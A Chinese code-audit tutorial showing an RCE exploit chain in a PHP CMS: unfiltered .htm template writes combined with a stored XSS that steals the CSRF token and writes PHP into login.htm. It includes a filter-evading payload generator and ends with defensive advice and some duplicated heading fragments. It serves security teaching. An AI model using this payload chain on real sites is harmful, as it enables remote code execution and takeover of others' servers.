代码审计中的RCE漏洞挖掘与POC编写实战教学<\/h1>

漏洞背景与发现<\/h2>
本次审计目标是一个CMS系统，其模板引入方式存在安全隐患。系统直接使用`include<\/code>包含.htm<\/code>模板文件，而不是将PHP处理后的数据放入模板中。这种设计为后续的远程代码执行(RCE)漏洞埋下了隐患。<\/p>`

核心漏洞分析<\/h2>
1. 文件管理模块漏洞<\/h3>
漏洞位于src\/admin\/file_manage_control.php<\/code>文件，该文件负责处理文件操作，但防护策略存在缺陷：<\/p>
路径处理漏洞 ($activepath)<\/h4>

代码仅规范化路径，防止目录遍历(..<\/code>)<\/li>
未限制同一目录下的文件夹名访问<\/li>
关键防御代码(15-17行)过于简单<\/li>
<\/ul>
文件名处理漏洞 ($filename)<\/h4>

代码(44-48行)过滤了危险扩展名：php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml<\/code><\/li>
但.htm<\/code>扩展名未被过滤<\/li>
仅检查文件名中的..<\/code>，无其他严格限制<\/li>
<\/ul>
2. 模板包含机制漏洞<\/h3>
系统使用危险的方式包含模板文件：<\/p>
include<\/span> XXInclude<\/span>('templets\/catalog_add.htm'<\/span>);
<\/span><\/span><\/code><\/pre>这种设计允许：<\/p>

将PHP代码写入.htm<\/code>文件<\/li>
当该文件被include<\/code>时，PHP代码会被执行<\/li>
<\/ol>
漏洞利用链构建<\/h2>
初始利用限制<\/h3>

仅后台管理员可访问\/admin<\/code>路由<\/li>
仅管理员有文件修改权限<\/li>
<\/ul>
权限绕过方案<\/h3>
方案1: 利用登录页面<\/h4>

\/admin\/login.php<\/code>无需权限即可访问<\/li>
可将恶意代码写入\/admin\/login.htm<\/code><\/li>
<\/ul>
方案2: 组合其他漏洞提升权限<\/h4>


SQL注入<\/strong>：<\/p>

在src\/admin\/article_edit.php<\/code>中发现疑似SQL注入点(148行)<\/li>
查询语句未使用参数化：<\/li>
<\/ul>
$query =<\/span> "UPDATE `#@__archives` SET typeid='<\/span>$typeid<\/span>',... WHERE id='<\/span>$id<\/span>';"<\/span>;
<\/span><\/span><\/code><\/pre>
但系统有CheckSql<\/code>过滤机制，可能需要特殊绕过技巧<\/li>
<\/ul>
<\/li>

存储型XSS<\/strong>：<\/p>

参数未做XSS过滤<\/li>
可在文档中插入XSS payload<\/li>
管理员审核时触发XSS，自动写入shell<\/li>
<\/ul>
<\/li>
<\/ol>
完整利用链POC<\/h2>
XSS Payload生成器<\/h3>
\/\/ 将此脚本放在浏览器控制台执行即可获得payload
<\/span><\/span><\/span><\/span>var<\/span> codeString<\/span> =<\/span> "\/\/ 获取URL\n"<\/span> +<\/span>
<\/span><\/span>    "var url = document.URL;\n"<\/span> +<\/span>
<\/span><\/span>    "var domainMatch = url.match(\/^(https?:\\\/\\\/[^\/]+)\/);\n"<\/span> +<\/span>
<\/span><\/span>    "var domain = domainMatch[1];\n"<\/span> +<\/span>
<\/span><\/span>    "\n"<\/span> +<\/span>
<\/span><\/span>    "\/\/ 获取Cookie\n"<\/span> +<\/span>
<\/span><\/span>    "var cookieString = document.cookie;\n"<\/span> +<\/span>
<\/span><\/span>    "\n"<\/span> +<\/span>
<\/span><\/span>    "\/\/ 创建一个新的 form 元素\n"<\/span> +<\/span>
<\/span><\/span>    "var form = document.createElement(\"form\");\n"<\/span> +<\/span>
<\/span><\/span>    "\n"<\/span> +<\/span>
<\/span><\/span>    "\/\/ 设置 form 的属性\n"<\/span> +<\/span>
<\/span><\/span>    "form.setAttribute(\"method\", \"POST\");\n"<\/span> +<\/span>
<\/span><\/span>    "form.setAttribute(\"action\", domain+\"\/admin\/file_manage_control.php\");\n"<\/span> +<\/span>
<\/span><\/span>    "\n"<\/span> +<\/span>
<\/span><\/span>    "\/\/ 使用正则表达式匹配 dede_csrf_token 的值\n"<\/span> +<\/span>
<\/span><\/span>    "var csrfTokenMatch = cookieString.match(\/dede_csrf_token=([^;]+)\/);\n"<\/span> +<\/span>
<\/span><\/span>    "\n"<\/span> +<\/span>
<\/span><\/span>    "\/\/ 提取匹配到的值\n"<\/span> +<\/span>
<\/span><\/span>    "var csrfTokenValue = csrfTokenMatch[1]; \/\/ 提取匹配到的值\n"<\/span> +<\/span>
<\/span><\/span>    "\n"<\/span> +<\/span>
<\/span><\/span>    "\/\/ 创建并设置隐藏字段\n"<\/span> +<\/span>
<\/span><\/span>    "var fields = [\n"<\/span> +<\/span>
<\/span><\/span>    "  { name: \"fmdo\", value: \"edit\" },\n"<\/span> +<\/span>
<\/span><\/span>    "  { name: \"backurl\", value: \"\" },\n"<\/span> +<\/span>
<\/span><\/span>    "  { name: \"_csrf_token\", value: csrfTokenValue },\n"<\/span> +<\/span>
<\/span><\/span>    "  { name: \"activepath\", value: \"\/admin\/templets\" },\n"<\/span> +<\/span>
<\/span><\/span>    "  { name: \"filename\", value: \"login.htm\" },\n"<\/span> +<\/span>
<\/span><\/span>    "  { name: \"str\", value: \"1<?php phpinfo();?>\" },\n"<\/span> +<\/span>
<\/span><\/span>    "  { name: \"B1\", value: \"\" }\n"<\/span> +<\/span>
<\/span><\/span>    "];\n"<\/span> +<\/span>
<\/span><\/span>    "\n"<\/span> +<\/span>
<\/span><\/span>    "\/\/ 遍历字段数组并创建相应的 input 元素\n"<\/span> +<\/span>
<\/span><\/span>    "fields.forEach(function (field) {\n"<\/span> +<\/span>
<\/span><\/span>    "  var input = document.createElement(\"input\");\n"<\/span> +<\/span>
<\/span><\/span>    "  input.setAttribute(\"type\", \"hidden\");\n"<\/span> +<\/span>
<\/span><\/span>    "  input.setAttribute(\"name\", field.name);\n"<\/span> +<\/span>
<\/span><\/span>    "  input.setAttribute(\"value\", field.value);\n"<\/span> +<\/span>
<\/span><\/span>    "  form.appendChild(input);\n"<\/span> +<\/span>
<\/span><\/span>    "});\n"<\/span> +<\/span>
<\/span><\/span>    "\n"<\/span> +<\/span>
<\/span><\/span>    "\/\/ 创建一个提交按钮并添加到 form 中\n"<\/span> +<\/span>
<\/span><\/span>    "var submitButton = document.createElement(\"input\");\n"<\/span> +<\/span>
<\/span><\/span>    "submitButton.setAttribute(\"type\", \"submit\");\n"<\/span> +<\/span>
<\/span><\/span>    "submitButton.setAttribute(\"value\", \"Submit request\");\n"<\/span> +<\/span>
<\/span><\/span>    "form.appendChild(submitButton);\n"<\/span> +<\/span>
<\/span><\/span>    "\n"<\/span> +<\/span>
<\/span><\/span>    "\/\/ 将 form 添加到文档中并自动提交\n"<\/span> +<\/span>
<\/span><\/span>    "document.body.appendChild(form);\n"<\/span> +<\/span>
<\/span><\/span>    "form.submit();"<\/span>;
<\/span><\/span>
<\/span><\/span>\/\/ 转换为ASCII码形式以绕过简单过滤
<\/span><\/span><\/span><\/span>var<\/span> asciiArray<\/span> =<\/span> [];
<\/span><\/span>for<\/span> (var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> codeString<\/span>.length<\/span>; i<\/span>++<\/span>) {
<\/span><\/span>    asciiArray<\/span>.push<\/span>(codeString<\/span>.charCodeAt<\/span>(i<\/span>));
<\/span><\/span>}
<\/span><\/span>var<\/span> asciiString<\/span> =<\/span> asciiArray<\/span>.join<\/span>(','<\/span>);
<\/span><\/span>console<\/span>.log<\/span>(''<\/span>)
<\/span><\/span><\/code><\/pre>利用步骤<\/h3>

攻击者利用普通用户权限在文档中插入XSS payload<\/li>
管理员审核文档时触发XSS<\/li>
XSS自动向\/admin\/file_manage_control.php<\/code>发送POST请求<\/li>
将PHP代码写入\/admin\/templets\/login.htm<\/code><\/li>
访问http:\/\/target\/admin\/login.php<\/code>执行代码<\/li>
<\/ol>
防御建议<\/h2>


模板包含机制<\/strong>：<\/p>

避免直接包含用户可控的模板文件<\/li>
使用模板引擎或严格的过滤机制<\/li>
<\/ul>
<\/li>

文件管理模块<\/strong>：<\/p>

实施更严格的文件扩展名过滤<\/li>
增加文件内容安全检查<\/li>
限制可编辑的文件路径范围<\/li>
<\/ul>
<\/li>

输入验证<\/strong>：<\/p>

对所有用户输入实施严格的过滤<\/li>
对SQL查询使用参数化查询<\/li>
对所有输出进行HTML编码<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

实施最小权限原则<\/li>
关键操作需要二次验证<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
本案例展示了如何通过代码审计发现RCE漏洞，并构建完整的利用链。关键点包括：<\/p>

识别危险的模板包含机制<\/li>
分析文件管理模块的过滤缺陷<\/li>
结合XSS绕过权限限制<\/li>
编写自动化攻击的POC<\/li>
<\/ol>
这种漏洞组合在实际渗透测试中很常见，理解其原理有助于开发更安全的系统和进行更有效的安全测试。<\/p>
代码审计中的RCE漏洞挖掘与POC编写实战教学<\/h1>

1. 文件管理模块漏洞<\/h3> 漏洞位于src\/admin\/file_manage_control.php<\/code>文件，该文件负责处理文件操作，但防护策略存在缺陷：<\/p>

漏洞利用链构建<\/h2>

权限绕过方案<\/h3>

完整利用链POC<\/h2>

1. 文件管理模块漏洞<\/h3>
漏洞位于`src\/admin\/file_manage_control.php<\/code>文件，该文件负责处理文件操作，但防护策略存在缺陷：<\/p>`
